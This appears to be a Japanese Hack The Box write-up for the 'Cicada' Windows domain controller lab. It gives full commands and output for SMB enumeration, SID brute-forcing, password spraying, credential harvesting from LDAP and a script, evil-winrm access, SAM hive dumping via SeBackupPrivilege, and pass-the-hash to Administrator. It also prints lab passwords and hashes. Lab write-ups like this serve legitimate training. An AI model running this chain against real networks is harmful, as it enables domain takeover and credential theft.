目次
偵察
nmapによるスキャンを行います。
PORT STATE SERVICE REASON VERSION 53/tcp open domain syn-ack ttl 127 Simple DNS Plus 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2026-03-07 19:21:01Z) 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name) |_ssl-date: 2026-03-07T19:22:39+00:00; +6h59m51s from scanner time. | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:CICADA-DC.cicada.htb | Issuer: commonName=CICADA-DC-CA/domainComponent=cicada | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-08-22T20:24:16 | Not valid after: 2025-08-22T20:24:16 | MD5: 9ec5 1a23 40ef b5b8 3d2c 39d8 447d db65 | SHA-1: 2c93 6d7b cfd8 11b9 9f71 1a5a 155d 88d3 4a52 157a | SHA-256: c8b9 54cb f36f 460f 859f 24c6 f4b1 7245 3eec 001b ce26 2f62 7229 4374 b24d 0772 | -----BEGIN CERTIFICATE----- | MIIF4DCCBMigAwIBAgITHgAAAAOY38QFU4GSRAABAAAAAzANBgkqhkiG9w0BAQsF | ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGY2ljYWRh | MRUwEwYDVQQDEwxDSUNBREEtREMtQ0EwHhcNMjQwODIyMjAyNDE2WhcNMjUwODIy | MjAyNDE2WjAfMR0wGwYDVQQDExRDSUNBREEtREMuY2ljYWRhLmh0YjCCASIwDQYJ | KoZIhvcNAQEBBQADggEPADCCAQoCggEBAOatZznJ1Zy5E8fVFsDWtq531KAmTyX8 | BxPdIVefG1jKHLYTvSsQLVDuv02+p29iH9vnqYvIzSiFWilKCFBxtfOpyvCaEQua | NaJqv3quymk/pw0xMfSLMuN5emPJ5yHtC7cantY51mSDrvXBxMVIf23JUKgbhqSc | Srdh8fhL8XKgZXVjHmQZVn4ONg2vJP2tu7P1KkXXj7Mdry9GFEIpLdDa749PLy7x | o1yw8CloMMtcFKwVaJHy7tMgwU5PVbFBeUhhKhQ8jBR3OBaMBtqIzIAJ092LNysy | 4W6q8iWFc+Tb43gFP4nfb1Xvp5mJ2pStqCeZlneiL7Be0SqdDhljB4ECAwEAAaOC | Au4wggLqMC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8A | bABsAGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/ | BAQDAgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3 | DQMEAgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjAL | BglghkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFAY5YMN7 | Sb0WV8GpzydFLPC+751AMB8GA1UdIwQYMBaAFIgPuAt1+B1uRE3nh16Q6gSBkTzp | MIHLBgNVHR8EgcMwgcAwgb2ggbqggbeGgbRsZGFwOi8vL0NOPUNJQ0FEQS1EQy1D | QSxDTj1DSUNBREEtREMsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2Vz | LENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Y2ljYWRhLERDPWh0Yj9j | ZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlz | dHJpYnV0aW9uUG9pbnQwgb0GCCsGAQUFBwEBBIGwMIGtMIGqBggrBgEFBQcwAoaB | nWxkYXA6Ly8vQ049Q0lDQURBLURDLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXkl | MjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPWNpY2Fk | YSxEQz1odGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmlj | YXRpb25BdXRob3JpdHkwQAYDVR0RBDkwN6AfBgkrBgEEAYI3GQGgEgQQ0dpG4APi | HkGYUf0NXWYT14IUQ0lDQURBLURDLmNpY2FkYS5odGIwDQYJKoZIhvcNAQELBQAD | ggEBAIrY4wzebzUMnbrfpkvGA715ds8pNq06CN4/24q0YmowD+XSR/OI0En8Z9LE | eytwBsFZJk5qv9yY+WL4Ubb4chKSsNjuc5SzaHxXAVczpNlH/a4WAKfVMU2D6nOb | xxqE1cVIcOyN4b3WUhRNltauw81EUTa4xT0WElw8FevodHlBXiUPUT9zrBhnvNkz | obX8oU3zyMO89QwxsusZ0TLiT/EREW6N44J+ROTUzdJwcFNRl+oLsiK5z/ltLRmT | P/gFJvqMFfK4x4/ftmQV5M3hb0rzUcS4NJCGtclEoxlJHRTDTG6yZleuHvKSN4JF | ji6zxYOoOznp6JlmbakLb1ZRLA8= |_-----END CERTIFICATE----- 445/tcp open microsoft-ds? syn-ack ttl 127 464/tcp open kpasswd5? syn-ack ttl 127 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name) |_ssl-date: 2026-03-07T19:22:39+00:00; +6h59m52s from scanner time. | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1: , DNS:CICADA-DC.cicada.htb | Issuer: commonName=CICADA-DC-CA/domainComponent=cicada | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-08-22T20:24:16 | Not valid after: 2025-08-22T20:24:16 | MD5: 9ec5 1a23 40ef b5b8 3d2c 39d8 447d db65 | SHA-1: 2c93 6d7b cfd8 11b9 9f71 1a5a 155d 88d3 4a52 157a | SHA-256: c8b9 54cb f36f 460f 859f 24c6 f4b1 7245 3eec 001b ce26 2f62 7229 4374 b24d 0772 | -----BEGIN CERTIFICATE----- | MIIF4DCCBMigAwIBAgITHgAAAAOY38QFU4GSRAABAAAAAzANBgkqhkiG9w0BAQsF | ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGY2ljYWRh | MRUwEwYDVQQDEwxDSUNBREEtREMtQ0EwHhcNMjQwODIyMjAyNDE2WhcNMjUwODIy | MjAyNDE2WjAfMR0wGwYDVQQDExRDSUNBREEtREMuY2ljYWRhLmh0YjCCASIwDQYJ | KoZIhvcNAQEBBQADggEPADCCAQoCggEBAOatZznJ1Zy5E8fVFsDWtq531KAmTyX8 | BxPdIVefG1jKHLYTvSsQLVDuv02+p29iH9vnqYvIzSiFWilKCFBxtfOpyvCaEQua | NaJqv3quymk/pw0xMfSLMuN5emPJ5yHtC7cantY51mSDrvXBxMVIf23JUKgbhqSc | Srdh8fhL8XKgZXVjHmQZVn4ONg2vJP2tu7P1KkXXj7Mdry9GFEIpLdDa749PLy7x | o1yw8CloMMtcFKwVaJHy7tMgwU5PVbFBeUhhKhQ8jBR3OBaMBtqIzIAJ092LNysy | 4W6q8iWFc+Tb43gFP4nfb1Xvp5mJ2pStqCeZlneiL7Be0SqdDhljB4ECAwEAAaOC | Au4wggLqMC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8A | bABsAGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/ | BAQDAgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3 | DQMEAgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjAL | BglghkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFAY5YMN7 | Sb0WV8GpzydFLPC+751AMB8GA1UdIwQYMBaAFIgPuAt1+B1uRE3nh16Q6gSBkTzp | MIHLBgNVHR8EgcMwgcAwgb2ggbqggbeGgbRsZGFwOi8vL0NOPUNJQ0FEQS1EQy1D | QSxDTj1DSUNBREEtREMsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2Vz | LENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Y2ljYWRhLERDPWh0Yj9j | ZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlz | dHJpYnV0aW9uUG9pbnQwgb0GCCsGAQUFBwEBBIGwMIGtMIGqBggrBgEFBQcwAoaB | nWxkYXA6Ly8vQ049Q0lDQURBLURDLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXkl | MjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPWNpY2Fk | YSxEQz1odGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmlj | YXRpb25BdXRob3JpdHkwQAYDVR0RBDkwN6AfBgkrBgEEAYI3GQGgEgQQ0dpG4APi | HkGYUf0NXWYT14IUQ0lDQURBLURDLmNpY2FkYS5odGIwDQYJKoZIhvcNAQELBQAD | ggEBAIrY4wzebzUMnbrfpkvGA715ds8pNq06CN4/24q0YmowD+XSR/OI0En8Z9LE | eytwBsFZJk5qv9yY+WL4Ubb4chKSsNjuc5SzaHxXAVczpNlH/a4WAKfVMU2D6nOb | xxqE1cVIcOyN4b3WUhRNltauw81EUTa4xT0WElw8FevodHlBXiUPUT9zrBhnvNkz | obX8oU3zyMO89QwxsusZ0TLiT/EREW6N44J+ROTUzdJwcFNRl+oLsiK5z/ltLRmT | P/gFJvqMFfK4x4/ftmQV5M3hb0rzUcS4NJCGtclEoxlJHRTDTG6yZleuHvKSN4JF | ji6zxYOoOznp6JlmbakLb1ZRLA8= |_-----END CERTIFICATE----- 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 64348/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
SMBの共有一覧を確認します。HRにはデフォルトのパスワードを含むテキストがありました。
┌──(kali㉿kali)-[~/htb/cicada]
└─$ smbclient -L //10.129.231.149/ -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.231.149 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/htb/cicada]
└─$ smbclient //10.129.231.149/HR -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 21:29:09 2024
.. D 0 Thu Mar 14 21:21:29 2024
Notice from HR.txt A 1266 Thu Aug 29 02:31:48 2024
4168447 blocks of size 4096. 481132 blocks available
smb: \>
次に匿名でのSIDブルートフォースを行います。
┌──(kali㉿kali)-[~/htb/cicada] └─$ impacket-lookupsid anonymous@10.129.231.149 Impacket v0.14.0.dev0+20260109.161801.028f0724 - Copyright Fortra, LLC and its affiliated companies Password: [*] Brute forcing SIDs at 10.129.231.149 [*] StringBinding ncacn_np:10.129.231.149[\pipe\lsarpc] [*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup) 500: CICADA\Administrator (SidTypeUser) 501: CICADA\Guest (SidTypeUser) 502: CICADA\krbtgt (SidTypeUser) 512: CICADA\Domain Admins (SidTypeGroup) 513: CICADA\Domain Users (SidTypeGroup) 514: CICADA\Domain Guests (SidTypeGroup) 515: CICADA\Domain Computers (SidTypeGroup) 516: CICADA\Domain Controllers (SidTypeGroup) 517: CICADA\Cert Publishers (SidTypeAlias) 518: CICADA\Schema Admins (SidTypeGroup) 519: CICADA\Enterprise Admins (SidTypeGroup) 520: CICADA\Group Policy Creator Owners (SidTypeGroup) 521: CICADA\Read-only Domain Controllers (SidTypeGroup) 522: CICADA\Cloneable Domain Controllers (SidTypeGroup) 525: CICADA\Protected Users (SidTypeGroup) 526: CICADA\Key Admins (SidTypeGroup) 527: CICADA\Enterprise Key Admins (SidTypeGroup) 553: CICADA\RAS and IAS Servers (SidTypeAlias) 571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias) 572: CICADA\Denied RODC Password Replication Group (SidTypeAlias) 1000: CICADA\CICADA-DC$ (SidTypeUser) 1101: CICADA\DnsAdmins (SidTypeAlias) 1102: CICADA\DnsUpdateProxy (SidTypeGroup) 1103: CICADA\Groups (SidTypeGroup) 1104: CICADA\john.smoulder (SidTypeUser) 1105: CICADA\sarah.dantelia (SidTypeUser) 1106: CICADA\michael.wrightson (SidTypeUser) 1108: CICADA\david.orelious (SidTypeUser) 1109: CICADA\Dev Support (SidTypeGroup) 1601: CICADA\emily.oscars (SidTypeUser)
確認できたユーザー名の内、デフォルトパスワードのままのユーザーを確認できます。
┌──(kali㉿kali)-[~/htb/cicada] └─$ crackmapexec smb 10.129.231.149 -u users.txt -p passwords.txt --continue-on-success ---snip--- SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
取得したアカウント情報でldapdomaindumpを実行します。
┌──(kali㉿kali)-[~/htb/cicada] └─$ ldapdomaindump ldap://10.129.231.149 -u 'cicada.htb\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' [*] Connecting to host... [*] Binding to host [+] Bind OK [*] Starting domain dump [+] Domain dump finished
descriptionにパスワード情報が含まれるユーザーが確認できます。
david.orelious/aRt$Lp#7t*VQ!3
確認できたアカウント情報でdevにアクセスするとスクリプトファイルを取得できます。
┌──(kali㉿kali)-[~/htb/cicada]
└─$ smbclient //10.129.231.149/DEV -U david.orelious@cicada.htb
Password for [david.orelious@CICADA.HTB]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 21:31:39 2024
.. D 0 Thu Mar 14 21:21:29 2024
Backup_script.ps1 A 601 Thu Aug 29 02:28:22 2024
4168447 blocks of size 4096. 478371 blocks available
スクリプトファイル内には別のユーザーのアカウント情報が含まれていました。
┌──(kali㉿kali)-[~/htb/cicada] └─$ cat Backup_script.ps1 $sourceDirectory = "C:\smb" $destinationDirectory = "D:\Backup" $username = "emily.oscars" $password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force $credentials = New-Object System.Management.Automation.PSCredential($username, $password) $dateStamp = Get-Date -Format "yyyyMMdd_HHmmss" $backupFileName = "smb_backup_$dateStamp.zip" $backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
user.txt取得
スクリプトから確認できたアカウント情報でwinrmへ接続できます。
┌──(kali㉿kali)-[~/htb/cicada]
└─$ evil-winrm -i 10.129.231.149 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>
権限昇格
emily.oscarsはSeBackupPrivilegeがあります。
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
上記の権限でローカルマシンのsamとsystemを取得します。
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> reg save hklm\sam C:\temp\sam.hive
reg.exe : ERROR: The system was unable to find the specified registry key or value.
+ CategoryInfo : NotSpecified: (ERROR: The syst...y key or value.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> reg save hklm\sam C:\Users\emily.oscars.CICADA\sam.hive
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> reg save hklm\system C:\Users\emily.oscars.CICADA\system.hive
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> download sam.hive
Info: Downloading C:\Users\emily.oscars.CICADA\sam.hive to sam.hive
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> download system.hive
Info: Downloading C:\Users\emily.oscars.CICADA\system.hive to system.hive
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA>
取得したハッシュ値でAdministratorとしてアクセスできます。
┌──(kali㉿kali)-[~/htb/cicada]
└─$ impacket-secretsdump -sam sam.hive -system system.hive local
Impacket v0.14.0.dev0+20260109.161801.028f0724 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
┌──(kali㉿kali)-[~/htb/cicada]
└─$ evil-winrm -i 10.129.231.149 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
